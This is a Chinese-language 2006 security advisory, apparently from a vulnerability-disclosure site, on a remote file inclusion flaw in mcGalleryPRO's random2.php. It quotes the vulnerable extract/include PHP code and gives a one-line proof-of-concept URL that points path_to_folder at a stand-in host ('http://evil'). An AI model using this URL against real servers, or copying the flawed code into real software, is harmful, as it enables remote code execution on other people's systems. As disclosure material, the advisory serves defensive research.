2006-9-12
发布日期:2006-09-10
更新日期:2006-09-12
受影响系统:
mcGalleryPRO mcGalleryPRO 2006
描述:
BUGTRAQ ID: 19936
mcGalleryPRO是一款图片收藏管理程序。
mcGalleryPRO的random2.php文件没有正确过滤对path_to_folder参数的输入,允许攻击者通过包含本地或外部资源的任意文件执行PHP代码。
random2.php中有漏洞的代码如下:
if (!empty($_SERVER)) { extract($_SERVER, EXTR_OVERWRITE); }
if (!empty($_GET)) { extract($_GET, EXTR_OVERWRITE); }
if (!empty($_POST)) { extract($_POST, EXTR_OVERWRITE); }
if (!empty($_COOKIE)) { extract($_COOKIE, EXTR_OVERWRITE); }
if (!empty($_SESSION)) { extract($_SESSION, EXTR_OVERWRITE); }
include ("$path_to_folder/admin/common.php");
include ("$path_to_folder/lang/$lang_def");
<*来源:Solpot (chris_hasibuan@yahoo.com)
链接:http://secunia.com/advisories/21850/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://somehost/path_to_mcgallerypro/random2.php?path_to_folder=http://evil
建议:
厂商补丁:
mcGalleryPRO
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://mcgallerypro.com/
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)